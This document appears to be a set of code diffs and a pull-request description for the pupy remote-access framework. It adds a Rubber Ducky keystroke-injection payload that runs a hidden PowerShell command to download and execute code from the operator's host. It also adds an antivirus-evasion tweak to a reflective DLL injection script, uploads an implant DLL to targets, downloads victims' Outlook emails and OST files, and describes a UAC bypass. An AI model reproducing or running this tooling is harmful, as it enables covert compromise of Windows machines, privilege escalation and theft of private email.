+		Returns True if no error. Otherwise returns False
+		'''
+		res=self.module.client.conn.modules['pupy'].get_connect_back_host()
+		host, port = res.rsplit(':',1)
+		logging.info("Address configured is %s:%s for pupy dll..."%(host,port))
+		logging.info("Looking for process architecture...")
+		if self.module.client.conn.modules['pupwinutils.processes'].is_x64_architecture() == True:
+			logging.info("Target achitecture is x64, using a x64 dll")
+			dllbuff=pupygen.get_edit_pupyx64_dll(self.module.client.get_conf())
+		elif self.module.client.conn.modules['pupwinutils.processes'].is_x86_architecture() == True:
+			logging.info("Target achitecture is x86, using a x86 dll")
+			dllbuff=pupygen.get_edit_pupyx86_dll(self.module.client.get_conf())
+		else:
+			self.module.error("Target architecture is unknown (!= x86 or x64), abording...")
+			return False
+		logging.info("Creating the pupy dll in %s locally"%(self.pupyDLLLocalPath))
+		with open(self.pupyDLLLocalPath, 'w+') as w:
+			w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
+		logging.info("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath))
+		upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath)
+		return True
+		
+	def deleteTHisRemoteFile(self, remotePath):
+		'''
+		'''
+		logging.debug("Deleting the remote file {0}".format(remotePath))
+		try:
+			self.module.client.conn.modules['os'].remove(remotePath)
+		except Exception, e:
+			logging.warning('Impossible to delete remote file {0}: {1}'.format(remotePath, repr(e)))

--- a/pupy/modules/lib/windows/outlook.py
+++ b/pupy/modules/lib/windows/outlook.py
@@ -1,4 +1,6 @@
 # -*- coding: UTF8 -*-
+#Author: @bobsecq
+#Contributor(s):
 
 import os, logging, sys, time
 from rpyc.utils.classic import download

--- a/pupy/modules/lib/windows/powershell_upload.py
+++ b/pupy/modules/lib/windows/powershell_upload.py
@@ -1,7 +1,8 @@
+# -*- coding: UTF8 -*-
+
 from rpyc.utils.classic import upload
-import base64
+import base64, re, subprocess
 from subprocess import PIPE, Popen
-import subprocess
 
 def execute_powershell_script(module, content, function, x64IfPossible=False):
     '''
@@ -36,3 +37,34 @@ def execute_powershell_script(module, content, function, x64IfPossible=False):
     output = base64.b64decode(output)
     p.stdin.write("exit\n")
     return output
+
+def remove_comments(string):
+    '''
+    Remove comments in powershell script
+    '''
+    pattern = r"(\".*?\"|\'.*?\')|(<#.*?#>|#[^\r\n]*$)"
+    # first group captures quoted strings (double or single)
+    # second group captures comments (#single-line or <# multi-line #>)
+    regex = re.compile(pattern, re.MULTILINE|re.DOTALL)
+    def _replacer(match):
+        # if the 2nd group (capturing comments) is not None,
+        # it means we have captured a non-quoted (real) comment string.
+        if match.group(2) is not None:
+            return "" # so we will return empty to remove the comment
+        else: # otherwise, we will return the 1st group
+            return match.group(1) # captured quoted-string
+    return regex.sub(_replacer, string)
+
+def obfuscatePowershellScript(code):
+    '''
+    Try to clean powershell script (perhaps in the future 'obfuscation'...).
+    Comments are deteleted and some strings are replaced in some powershell functions to bypass AV detection
+    '''
+    import re
+    newCode = code
+    newCode = remove_comments(newCode)
+    #For Avast detection bypass. Very easy to bypass the AV detection : Shame on you Avast -:)
+    #Notice only Avast and Ikarus detect Invoke-ReflectivePEInjection.ps1 as a 'virus' (BV:AndroDrp-B [Drp], HackTool.Win32.Mikatz)
+    if "function Invoke-ReflectivePEInjection" in newCode:
+        newCode = newCode.replace("$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null", "$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERIS'+'TICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null")
+    return newCode

--- a/pupy/modules/outlook.py
+++ b/pupy/modules/outlook.py
@@ -17,10 +17,12 @@ class Outlook(PupyModule):
 		'''
 		'''
 		self.arg_parser = PupyArgumentParser(prog="outlook", description=self.__doc__)
+		self.arg_parser.add_argument('-i', dest='information', action='store_true', help="Get Outlook configuration")
 		self.arg_parser.add_argument('-l', dest='foldersAndSubFolders', action='store_true', help="Get Outlook folders and subfolders")
 		self.arg_parser.add_argument('-n', dest='numberOfEmails', action='store_true', help="Get number of emails stored in the outlook folder choisen (see options below)")
-		self.arg_parser.add_argument('-d', dest='downloadAllEmails', action='store_true', help="Download all emails stored in the outlook folder choisen (see options below)")
-		self.arg_parser.add_argument('-f', dest='localOutputFolder', default='output/', help="Folder which will contain emails locally (default: %(default)s)")
+		self.arg_parser.add_argument('-d', dest='downloadAllEmails', action='store_true', help="Download all emails stored in the outlook folder choisen with MAPI (see options below)")
+		self.arg_parser.add_argument('-t', dest='doawnloadOST', action='store_true', help="Download Outlook OST file (Offline or cached Outlook items)")
+		self.arg_parser.add_argument('-output-folder', dest='localOutputFolder', default='output/', help="Folder which will contain emails locally (default: %(default)s)")
 		self.arg_parser.add_argument('-folder-default', choices=list(outlook.OL_DEFAULT_FOLDERS), default="olFolderInbox", dest='outlookFolder', help="Choose Outlook Folder using a default folder (default: %(default)s)")
 		self.arg_parser.add_argument('-folder-id', dest='folderId', default=None, help="Choose Outlook Folder using a folder ID (default: %(default)s)")
 		self.arg_parser.add_argument('-otype', choices=list(outlook.OL_SAVE_AS_TYPE), default="olMSG", dest='msgSaveType', help="Email saved as this type (default: %(default)s)")
@@ -28,6 +30,19 @@ class Outlook(PupyModule):
 	def run(self, args):
 		'''
 		'''
+		try:
+			self.client.conn.modules['win32com.client'].Dispatch("Outlook.Application").GetNamespace("MAPI")
+			self.success("Outlook application seems to be installed on the target")
+		except Exception,e:
+			logging.info("Outlook Application is probably not installed on this target. Impossible to continue...\n{0}".format(repr(e)))
+			self.error("Outlook application doesn't seem to be installed on the target. Nothing to do. Cancelling!")
+			return
+		if args.information == True:
+			outl = outlook(self, ROOT, localFolder=args.localOutputFolder, folderIndex=outlook.OL_DEFAULT_FOLDERS[args.outlookFolder])
+			info = outl.getInformation()
+			for key, value in info.iteritems():
+				self.success("{0}: {1}".format(key, value))
+			outl.close()
 		if args.folderId != None:
 			self.warning('Notice the folder Id option will be used and the default folder option will be disabled')
 		if args.foldersAndSubFolders == True:
@@ -52,3 +67,11 @@ class Outlook(PupyModule):
 				self.warning("Notice if an antivirus is installed on the target, you should be abled to download emails without security prompt (see https://support.office.com/en-us/article/I-get-warnings-about-a-program-accessing-e-mail-address-information-or-sending-e-mail-on-my-behalf-df007135-c632-4ae4-8577-dd4ba26750a2)")
 				outl.downloadAllEmails()
 			outl.close()
+		if args.doawnloadOST == True:
+			outl = outlook(self, ROOT, localFolder=args.localOutputFolder, folderIndex=outlook.OL_DEFAULT_FOLDERS[args.outlookFolder], autoConnectToMAPI=False)
+			self.success("Trying to download Outlook OST file of the targeted current user")
+			path = outl.downloadOSTFile()
+			if path == None:
+				self.error("OST file not found or an error occured")
+			else:
+				self.success("OST file downloaded from {0} to {1}".format(path, outl.localFolder))

--- a/pupy/modules/outlook.py
+++ b/pupy/modules/outlook.py
@@ -1,4 +1,6 @@
 # -*- coding: UTF8 -*-
+#Author: @bobsecq
+#Contributor(s):
 
 import os
 from pupylib.PupyModule import *

--- a/pupy/pupy.conf
+++ b/pupy/pupy.conf
@@ -40,3 +40,10 @@ getppid = getppid
 pwd = pyexec -c 'import os;print os.getcwd()'
 #tasklist = shell_exec 'tasklist /v'
 creds = creds -S
+
+
+[rubber_ducky]
+#path to the encoder.jar file of Rubber-Ducky project (see https://github.com/hak5darren/USB-Rubber-Ducky/blob/master/Encoder/encoder.jar)
+encoder_path = TO_FILL
+#Path to the keyboard layout for generating inject.bin file (see https://github.com/hak5darren/USB-Rubber-Ducky/tree/master/Encoder/resources)
+default_keyboard_layout_path = TO_FILL

--- a/pupy/pupygen.py
+++ b/pupy/pupygen.py
@@ -8,6 +8,7 @@ from pupylib.utils.network import get_local_ip
 from pupylib.utils.term import colorize
 from pupylib.payloads.python_packer import gen_package_pickled_dic
 from pupylib.payloads.py_oneliner import serve_payload, pack_py_payload, getLinuxImportedModules
+from pupylib.payloads.rubber_ducky import rubber_ducky
 from pupylib.utils.obfuscate import compress_encode_obfs
 from network.conf import transports, launchers
 from network.lib.base_launcher import LauncherError
@@ -15,7 +16,8 @@ from scriptlets.scriptlets import ScriptletArgumentError
 from modules.lib.windows.powershell_upload import obfuscatePowershellScript
 import scriptlets
 import cPickle
-import base64, configparser
+import base64
+
 
 
 def get_edit_pupyx86_dll(conf):
@@ -249,6 +251,7 @@ class ListOptions(argparse.Action):
         print "\t- py_oneliner     : same as \"py\" format but served over http to load it from memory with a single command line."
         print "\t- ps1             : generate ps1 file which embeds pupy dll (x86-x64) and inject it to current process."
         print "\t- ps1_oneliner    : load pupy remotely from memory with a single command line using powershell."
+        print "\t- rubber_ducky    : generate a Rubber Ducky script and inject.bin file (Windows Only)."
 
         print ""
         print colorize("## available transports :","green")+" usage: -t <transport>"
@@ -265,7 +268,7 @@ class ListOptions(argparse.Action):
             print '\n'.join(["\t"+x for x in sc.get_help().split("\n")])
         exit()
 
-PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'pyinst', 'py_oneliner', 'ps1', 'ps1_oneliner']
+PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'pyinst', 'py_oneliner', 'ps1', 'ps1_oneliner','rubber_ducky']
 if __name__=="__main__":
     if os.path.dirname(__file__):
         os.chdir(os.path.dirname(__file__))
@@ -393,6 +396,8 @@ if __name__=="__main__":
         i=conf["launcher_args"].index("--host")+1
         link_ip=conf["launcher_args"][i].split(":",1)[0]
         serve_ps1_payload(conf, link_ip=link_ip)
+    elif args.format=="rubber_ducky":
+        rubber_ducky(conf).generateAllForOStarget()
     else:
         exit("Type %s is invalid."%(args.format))
     print(colorize("[+] ","green")+"payload successfully generated with config :")

--- a/pupy/pupygen.py
+++ b/pupy/pupygen.py
@@ -12,9 +12,10 @@ from pupylib.utils.obfuscate import compress_encode_obfs
 from network.conf import transports, launchers
 from network.lib.base_launcher import LauncherError
 from scriptlets.scriptlets import ScriptletArgumentError
+from modules.lib.windows.powershell_upload import obfuscatePowershellScript
 import scriptlets
 import cPickle
-import base64
+import base64, configparser
 
 
 def get_edit_pupyx86_dll(conf):
@@ -384,7 +385,7 @@ if __name__=="__main__":
             x64InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart)
             x64ConcatCode += "$PEBytes{0}+".format(i)
         print(colorize("[+] ","green")+"X64 dll loaded and {0} variables used".format(i+1))
-        script = open(os.path.join("external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read()
+        script = obfuscatePowershellScript(open(os.path.join("external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read())
         with open(outpath, 'wb') as w:
             w.write("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1], x64InitCode, x64ConcatCode[:-1]) ))
     elif args.format=="ps1_oneliner":
@@ -399,9 +400,6 @@ if __name__=="__main__":
     print("LAUNCHER = %s"%repr(args.launcher))
     print("LAUNCHER_ARGS = %s"%repr(args.launcher_args))
     print("SCRIPTLETS = %s"%args.scriptlet)
-
-
-
 
 
 

--- a/pupy/pupylib/payloads/rubber_ducky.py
+++ b/pupy/pupylib/payloads/rubber_ducky.py
@@ -1,0 +1,78 @@
+# -*- coding: UTF8 -*-
+from pupylib.utils.term import colorize
+import subprocess
+try:
+    import ConfigParser as configparser
+except ImportError:
+    import configparser
+
+
+class rubber_ducky():
+    '''
+    '''
+    TARGET_OS_MANAGED = ['Windows']
+    ENCODE_CMD = "java -jar {0}  -i {1}  -l {2} -o {3}" #{0} encode.jar file, {1} rubber ducky script file, {2} layout file, {3} output file
+    WINDOWS_SCRIPT = """DELAY 3000\nGUI r\nDELAY 500\nSTRING powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://{0}:{1}/p')"\nENTER"""#{0} ip {1} port
+    
+    def __init__(self, conf, link_port=8080, targetOs='Windows'):
+        '''
+        '''
+        self.conf = conf
+        i=conf["launcher_args"].index("--host")+1
+        self.link_ip = conf["launcher_args"][i].split(":",1)[0]
+        self.link_port = link_port
+        self.__loadRubberDuckyConf__()
+        self.rubberDuckyScriptFilename = 'rubberDuckyPayload.txt'
+        self.rubberDuckyBinFilename = 'inject.bin'
+        self.targetOs = targetOs
+        if self.targetOs not in self.TARGET_OS_MANAGED:
+            print(colorize("[+] ","red")+"Target OS ({0}) is not valid. It has to be in {1}".format(targetOs, self.TARGET_OS_MANAGED))
+        
+    def createRubberDuckyScriptForWindowsTarget(self):
+        '''
+        '''
+        with open(self.rubberDuckyScriptFilename, 'wb') as w:
+            w.write(self.WINDOWS_SCRIPT.format(self.link_ip, self.link_port))
+        print(colorize("[+] ","green")+"Rubber ducky script file generated in {0}".format(self.rubberDuckyScriptFilename))
+        
+    def generateInjectBinFile(self):
+        '''
+        returns True if no error
+        Otherwise returns False
+        '''
+        rubberDuckyEncodeCmd = self.ENCODE_CMD.format(self.encoderPath, self.rubberDuckyScriptFilename, self.keyboardLayoutPath, self.rubberDuckyBinFilename)
+        try:
+            output = subprocess.check_output(rubberDuckyEncodeCmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
+        except subprocess.CalledProcessError, e:
+            print(colorize("[+] ","red")+"Impossible to generate {0} file with encoder: {1}".format(self.rubberDuckyBinFilename, repr(e.output)))
+        except Exception, e:
+            print(colorize("[+] ","red")+"Impossible to generate {0} file with encoder: {1}".format(self.rubberDuckyBinFilename, repr(e)))
+            return False
+        else:
+            print(colorize("[+] ","green")+"encoder output:\n{0}".format(output))
+            print(colorize("[+] ","green")+"{0} has been created".format(self.rubberDuckyBinFilename))
+            return True
+
+    def __loadRubberDuckyConf__(self):
+        '''
+        '''
+        config = configparser.ConfigParser()
+        config.read("pupy.conf")
+        self.encoderPath = config.get("rubber_ducky","encoder_path")
+        self.keyboardLayoutPath = config.get("rubber_ducky","default_keyboard_layout_path")
+        if self.encoderPath == "TO_FILL":
+            print(colorize("[+] ","red")+"The 'encoder_path' value has to be filled in pupy.conf for generating inject.bin")
+        if self.keyboardLayoutPath == "TO_FILL":
+            print(colorize("[+] ","red")+"The 'default_keyboard_layout_path' value has to be filled in pupy.conf for generating inject.bin")
+
+    def generateAllForOStarget(self):
+        '''
+        '''
+        if self.targetOs == 'Windows':
+            from ps1_oneliner import serve_ps1_payload
+            self.createRubberDuckyScriptForWindowsTarget()
+            self.generateInjectBinFile()
+            print(colorize("[+] ","green")+"copy/paste inject.bin file on USB rubber ducky device")
+            print(colorize("[+] ","green")+"You should not pay attention to the following message (powershell command). This powershell command is embedded in the inject.bin file generated")
+            serve_ps1_payload(self.conf, link_ip=self.link_ip)
+        

--- a/pupy/pupylib/payloads/rubber_ducky.py
+++ b/pupy/pupylib/payloads/rubber_ducky.py
@@ -1,4 +1,7 @@
 # -*- coding: UTF8 -*-
+#Author: @bobsecq
+#Contributor(s):
+
 from pupylib.utils.term import colorize
 import subprocess
 try:


### PR DESCRIPTION
- **New UAC bypass method** for **wind10**. Based on enigma0x3's method: 

> Bypasses UAC by performing an image hijack on the .msc file extension

 (https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1). enigma0x3's POC has been re-coded in python. Thanks to enigma0x3 for this Powershell POC. 

This method (_eventvwr_) is enabled when the target is wind10 by default. _sysprep_ method is used when the target is wind7-8.1 by default. The user can choose the method that he want now (_sysprep_ or _eventvwr_). _sysprep_ method can be used on wind7-8.1 (no wind10) while _eventvwr_ can be used on wind7-10.

The _eventvwr_ method of bypassUAC module has been tested on wind7 (x64) and wind10 (x64).

- **New command in Outlook module** for getting information about Outlook configurations.

- Cleans Powershell script in ps1 output.

- **Rubber Ducky** (_rubber_ducky_) option for generating a script file and inject.bin file. The pupy.conf file has to be filled for generating inject.bin file. It uses _ps1_oneliner_ method. Implemented for Windows only at the moment. Tested with _Twin Duck_ firmware on wind7 (x64).